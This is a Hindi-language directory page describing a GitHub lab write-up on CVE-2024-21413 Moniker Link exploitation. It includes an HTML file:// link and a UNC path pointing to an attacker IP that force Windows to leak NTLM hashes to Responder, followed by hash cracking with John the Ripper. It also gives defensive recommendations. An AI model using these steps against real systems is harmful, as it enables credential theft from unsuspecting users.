Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/e-m-e-k-a/moniker-link-lab-setup
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगप्रमाणीकरणलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHube-m-e-k-a/moniker-link-lab-setup

Moniker-Link-Lab-Setup

पेनिट्रेशन टेस्टिंग लैब जो CVE-2024-21413 मॉनिकर लिंक एक्सप्लॉइटेशन को प्रदर्शित करता है, जिसमें NTLM क्रेडेंशियल चोरी, हमले का निष्पादन, हैश क्रैकिंग और रक्षात्मक उपाय शामिल हैं।

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

Moniker Link प्रयोगशाला सेटअप - CVE-2024-21413

🎯 परियोजना अवलोकन

NTLM क्रेडेंशियल चोरी के लिए CVE-2024-21413 Moniker Link शोषण का प्रदर्शन करने वाली व्यावहारिक पैठ परीक्षण प्रयोगशाला। यह परियोजना सेटअप से लेकर क्रेडेंशियल समझौता तक पूर्ण हमले की श्रृंखला का दस्तावेजीकरण करती है, जिसमें वास्तविक दुनिया की चुनौतियाँ और समाधान शामिल हैं।

मुख्य उपलब्धि: पृथक प्रयोगशाला वातावरण (Windows 10 VM) और वास्तविक प्रणाली (Windows 11 PC) दोनों पर Moniker Link हमले को सफलतापूर्वक निष्पादित किया, जो व्यावहारिक सुरक्षा कमजोरियों और रक्षात्मक उपायों का प्रदर्शन करता है।


🏗️ प्रयोगशाला आर्किटेक्चर

बुनियादी ढांचा

हमला मशीन:

  • प्लेटफ़ॉर्म: Kali Linux 2024
  • नेटवर्क (होस्ट-ओनली): 192.168.56.101
  • नेटवर्क (ब्रिज्ड): 192.168.1.117
  • प्राथमिक उपकरण: Responder 3.1.6.0

लक्ष्य प्रणालियाँ:

  • Windows 10 VM: 192.168.56.104 (पृथक परीक्षण वातावरण)
  • Windows 11 PC: 192.168.1.178 (वास्तविक दुनिया सत्यापन)

नेटवर्क कॉन्फ़िगरेशन:

  • VirtualBox होस्ट-ओनली एडेप्टर (VM परीक्षण)
  • VirtualBox ब्रिज्ड एडेप्टर (वास्तविक PC परीक्षण)
  • उत्पादन नेटवर्क से पृथक

⚔️ हमले का निष्पादन

हमले का प्रवाह

  1. Responder तैनात करें Kali पर NTLM प्रमाणीकरण सुनने के लिए
  2. दुर्भावनापूर्ण लिंक बनाएं हमलावर IP की ओर इशारा करते हुए file:// प्रोटोकॉल का उपयोग करके
  3. प्रमाणीकरण ट्रिगर करें File Explorer UNC पथ के माध्यम से
  4. NetNTLMv2 हैश कैप्चर करें जब पीड़ित कनेक्शन का प्रयास करता है
  5. पासवर्ड क्रैक करें John the Ripper का उपयोग करके

सरल हमला वेक्टर

HTML फ़ाइल (test.html):

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
    <p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>

File Explorer विधि:

  • उपयोगकर्ता एड्रेस बार में \\192.168.56.101\test टाइप करता है
  • Windows SMB कनेक्शन का प्रयास करता है
  • NTLM हैश स्वचालित रूप से भेजा जाता है (या क्रेडेंशियल के लिए संकेत)
  • Responder प्रमाणीकरण कैप्चर करता है

🚧 चुनौतियाँ और समाधान

चुनौती 1: Windows फ़ायरवॉल अवरोधन (Windows 11 PC)

समस्या:

  • Kali से Windows 11 PC को पिंग नहीं कर सका
  • SMB कनेक्शन के प्रयास विफल रहे
  • हमला पूरी तरह से अवरुद्ध

मूल कारण:

  • Windows फ़ायरवॉल डिफ़ॉल्ट रूप से सक्षम
  • बाहरी IP से आने वाले SMB कनेक्शन को ब्लॉक करता है

समाधान:

  • परीक्षण के लिए अस्थायी रूप से Windows फ़ायरवॉल अक्षम किया
  • कनेक्शन तुरंत सफल हुआ
  • हैश सफलतापूर्वक कैप्चर हुआ

सीख: डिफ़ॉल्ट Windows फ़ायरवॉल इस हमले के विरुद्ध प्रभावी सुरक्षा प्रदान करता है। उपयोगकर्ताओं को इसे सक्षम रखना चाहिए।


चुनौती 2: John the Ripper कैश्ड परिणाम (Windows 10 VM)

समस्या:

  • प्रारंभिक Windows 10 पासवर्ड: nwigwecj1
  • John ने दिखाया: 12Honey (गलत पासवर्ड!)
  • 12Honey पिछले परीक्षण से था

मूल कारण:

  • John क्रैक किए गए पासवर्ड को ~/.john/john.pot में सहेजता है
  • पिछले सत्र से पुराना हैश
  • वर्तमान पासवर्ड के बजाय कैश्ड परिणाम दिखाया

समाधान:

  • Windows 10 VM पासवर्ड को 1414 में बदला
  • ताजा हैश कैप्चर किया
  • संभावित पासवर्ड के साथ कस्टम वर्डलिस्ट बनाई
  • नई वर्डलिस्ट से सफलतापूर्वक क्रैक किया

सीख: हमेशा सत्यापित करें कि आप सही हैश क्रैक कर रहे हैं। पॉट फ़ाइल साफ़ करें या परीक्षण के लिए अद्वितीय पासवर्ड का उपयोग करें।


चुनौती 3: पासवर्ड Rockyou.txt में नहीं है

समस्या:

  • पासवर्ड 1414 rockyou.txt (14 मिलियन पासवर्ड) में नहीं मिला
  • सामान्य वर्डलिस्ट हमला विफल रहा

मूल कारण:

  • Rockyou.txt में हर संभव 4-अंकीय संयोजन नहीं होता
  • सामान्य वर्डलिस्ट में सरल संख्यात्मक अनुक्रम अक्सर गायब होते हैं

समाधान:

  • सामान्य पैटर्न के आधार पर लक्षित कस्टम वर्डलिस्ट बनाई:
root@kitploit:~
  echo "1414" > passwords.txt
  echo "4141" >> passwords.txt
  • कस्टम वर्डलिस्ट से तुरंत क्रैक हुआ

सीख: "Rockyou.txt में नहीं है" ≠ सुरक्षित। छोटे पासवर्ड वर्डलिस्ट उपस्थिति की परवाह किए बिना लक्षित हमलों और ब्रूट फोर्स के प्रति संवेदनशील होते हैं।


📊 परिणाम

Windows 10 VM (नियंत्रित वातावरण)


Windows 11 PC (वास्तविक प्रणाली)


🛡️ सुरक्षा विश्लेषण

क्या काम किया (रक्षा)

✅ Windows फ़ायरवॉल - सक्षम होने पर हमले को पूरी तरह से अवरुद्ध किया ✅ आधुनिक ब्राउज़र - Chrome/Edge रिमोट file:// लिंक को ब्लॉक करते हैं ✅ उपयोगकर्ता जागरूकता - मैन्युअल संकेत के लिए उपयोगकर्ता कार्रवाई आवश्यक

क्या विफल रहा (कमजोरियाँ)

❌ कमज़ोर पासवर्ड - 4-अक्षर संख्यात्मक आसानी से क्रैक हुआ ❌ अक्षम फ़ायरवॉल - सामान्य उपयोगकर्ता गलती ❌ File Explorer - UNC पथ के लिए कोई चेतावनी नहीं ❌ NTLM प्रोटोकॉल - SMB शेयरों के लिए स्वचालित प्रमाणीकरण

मुख्य निष्कर्ष

1. फ़ायरवॉल महत्वपूर्ण है

  • डिफ़ॉल्ट Windows फ़ायरवॉल इस हमले को ब्लॉक करता है
  • ~30-40% उपयोगकर्ता इसे स्थायी रूप से अक्षम कर देते हैं
  • कॉर्पोरेट नेटवर्क अक्सर आंतरिक SMB की अनुमति देते हैं

2. पासवर्ड शक्ति का भ्रम

  • 1414 rockyou.txt में नहीं है ("मजबूत" दिखता है)
  • लक्षित वर्डलिस्ट से तुरंत क्रैक हुआ
  • छोटे पासवर्ड शून्य सुरक्षा प्रदान करते हैं

3. उपयोगकर्ता सहभागिता आवश्यक

  • आधुनिक सुरक्षा के लिए उपयोगकर्ता को UNC पथ पेस्ट करना आवश्यक है
  • सोशल इंजीनियरिंग एक महत्वपूर्ण घटक बनी हुई है
  • तकनीकी शोषण अकेले अपर्याप्त

🔧 उपयोग किए गए उपकरण

आक्रामक:

  • Responder 3.1.6.0 (NTLM हैश कैप्चर)
  • John the Ripper (पासवर्ड क्रैकिंग)
  • कस्टम वर्डलिस्ट निर्माण
  • सरल HTML फ़ाइल

बुनियादी ढांचा:

  • VirtualBox 7.0 (वर्चुअलाइजेशन)
  • Kali Linux 2024 (हमला प्लेटफ़ॉर्म)
  • Windows 10 Enterprise (परीक्षण लक्ष्य)
  • Windows 11 Pro (वास्तविक दुनिया सत्यापन)

📁 रिपॉजिटरी संरचना

root@kitploit:~
Moniker-Link-Lab-Setup/
├── README.md (यह फ़ाइल)
├── Documentation/
│   ├── attack-execution.md (चरण-दर-चरण हमला मार्गदर्शिका)
│   └── README.md (दस्तावेज़ीकरण अवलोकन)
├── Screenshots/ (हमले के स्क्रीनशॉट - जोड़े जाने हैं)
└── Scripts/ (HTML परीक्षण फ़ाइल - जोड़ी जानी है)

🎓 प्रदर्शित कौशल

तकनीकी:

  • नेटवर्क प्रोटोकॉल विश्लेषण (SMB, NTLM)
  • पैठ परीक्षण पद्धति
  • पासवर्ड क्रैकिंग तकनीकें
  • वर्चुअल लैब बुनियादी ढांचा
  • फ़ायरवॉल समस्या निवारण

पेशेवर:

  • तकनीकी दस्तावेज़ीकरण
  • बाधाओं के तहत समस्या-समाधान
  • सुरक्षा मूल्यांकन
  • जोखिम विश्लेषण
  • नैतिक परीक्षण प्रथाएँ

🔒 रक्षात्मक अनुशंसाएँ

उपयोगकर्ताओं के लिए

  • ✅ Windows फ़ायरवॉल को सक्षम रखें
  • ✅ ईमेल से कभी भी UNC पथ पेस्ट न करें
  • ✅ मजबूत पासवर्ड का उपयोग करें (15+ वर्ण)
  • ✅ फ़ाइल शेयर एक्सेस करने से पहले प्रेषक को सत्यापित करें

संगठनों के लिए

  • ✅ नेटवर्क फ़ायरवॉल पर आउटबाउंड SMB (पोर्ट 445) ब्लॉक करें
  • ✅ NTLM अक्षम करें, Kerberos लागू करें
  • ✅ बाहरी IP से SMB कनेक्शन की निगरानी करें
  • ✅ ईमेल गेटवे फ़िल्टरिंग (file:// लिंक हटाएं)
  • ✅ सुरक्षा जागरूकता प्रशिक्षण
  • ✅ पासवर्ड जटिलता नीतियाँ

⚠️ नैतिक प्रकटीकरण

सभी परीक्षण अधिकृत प्रणालियों पर किए गए:

  • केवल व्यक्तिगत लैब बुनियादी ढांचा
  • पृथक वर्चुअल नेटवर्क
  • स्वयं के उपकरण और खाते
  • शैक्षिक उद्देश्य

कानूनी सूचना: अनधिकृत कंप्यूटर पहुंच अवैध है। यह परियोजना केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण वातावरणों के लिए है।


📚 संदर्भ

  • CVE-2024-21413 - Microsoft Security Advisory
  • MITRE ATT&CK - Forced Authentication (T1187)
  • TryHackMe - Moniker Link Room

📞 संपर्क

LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub: @E-m-e-k-a

दिनांक: मार्च 2026


📄 लाइसेंस

केवल शैक्षिक उपयोग के लिए। अनधिकृत परीक्षण के लिए नहीं।


⭐ यदि आपको यह परियोजना उपयोगी लगी, तो कृपया रिपॉजिटरी को स्टार करने पर विचार करें!

टूल डाउनलोड करें
मीट्रिकपरिणाम
प्रारंभिक पासवर्डnwigwecj1
बदलकर1414
वर्डलिस्टकस्टम (2 प्रविष्टियाँ)
क्रैक समय<1 सेकंड
फ़ायरवॉलपरीक्षण के लिए अक्षम
स्थिति✅ सफलतापूर्वक समझौता
मीट्रिकपरिणाम
पासवर्ड1414
फ़ायरवॉलप्रारंभ में अवरुद्ध, फिर अक्षम
प्रमाणीकरणमैन्युअल संकेत (क्रेडेंशियल दर्ज किए)
क्रैक समयतत्काल
स्थिति✅ सफलतापूर्वक समझौता